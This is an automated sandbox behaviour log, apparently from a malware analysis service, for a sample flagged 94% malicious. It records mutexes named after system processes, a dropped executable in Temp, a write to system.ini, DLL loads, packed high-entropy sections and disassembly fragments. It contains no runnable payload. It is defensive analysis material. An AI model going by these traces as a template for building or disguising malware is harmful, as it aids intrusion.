        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6020_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1940_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3816_
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6700_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6368_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6344_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6320_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6332_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_3788_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_3688_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_696_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4124_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2056_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\useroobebroker.exeM_3924_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6248_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5092_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1572_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_5584_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2508_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1724_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2784_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6968_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1076_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1800_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2216_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2336_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2312_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6196_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1084_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2064_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3304_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6848_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\systemsettings.exeM_6060_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6800_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_988_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_1932_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6824_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3832_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6444_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\Users\user\AppData\Local\Temp\odnhm.exeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile read: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: RHxJqGoGFB.exeReversingLabs: Detection: 94%
        Source: RHxJqGoGFB.exeString found in binary or memory: F-STOPW.
        Source: unknownProcess created: C:\Users\user\Desktop\RHxJqGoGFB.exe "C:\Users\user\Desktop\RHxJqGoGFB.exe"
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess created: C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wincorlib.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: quickactionsdatamodel.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mrmcorer.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: languageoverlayutil.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47mrm.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uiamanager.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.immersive.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.globalization.fontgroups.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: fontgroupsoverride.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: directmanipulation.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: notificationcontrollerps.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.applicationmodel.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.graphics.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: audioses.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mmdevapi.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: usermgrproxy.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: avrt.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.web.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: threadpoolwinrt.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: structuredquery.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.search.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: msasn1.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00987AC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00987AC0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00401360 push eax; ret 0_2_0040138D
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407601 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407601 push eax; iretd 0_2_00407660
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404C0D push eax; ret 0_2_00404F3B
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004075C2 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004074D3 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407580 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404F86 push eax; ret 0_2_00404F3B
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404B95 push eax; ret 0_2_00404BC2
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404BAE push eax; ret 0_2_00404BC2
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004072BE pushfd ; iretd 0_2_004072BF
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00908060 push eax; ret 0_2_0090808E
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EFD0 push eax; ret 0_2_0097EF85
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EBDF push eax; ret 0_2_0097EC0C
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EBF8 push eax; ret 0_2_0097EC0C
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EF58 push eax; ret 0_2_0097EF85
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F147F push eax; ret 35_2_007F14AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F17F8 push eax; ret 35_2_007F1825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F1870 push eax; ret 35_2_007F1825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F1498 push eax; ret 35_2_007F14AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C917F8 push eax; ret 36_2_00C91825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C9147F push eax; ret 36_2_00C914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C91870 push eax; ret 36_2_00C91825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C91498 push eax; ret 36_2_00C914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_01291498 push eax; ret 37_2_012914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_012917F8 push eax; ret 37_2_01291825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_0129147F push eax; ret 37_2_012914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_01291870 push eax; ret 37_2_01291825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F61870 push eax; ret 38_2_00F61825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F6147F push eax; ret 38_2_00F614AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F617F8 push eax; ret 38_2_00F61825
        Source: RHxJqGoGFB.exeStatic PE information: section name: .data entropy: 7.988084869146433
        Source: odnhm.exe.0.drStatic PE information: section name: .text entropy: 7.987906960065672
        Source: rkuso.exe.0.drStatic PE information: section name: .text entropy: 7.9869914828814625
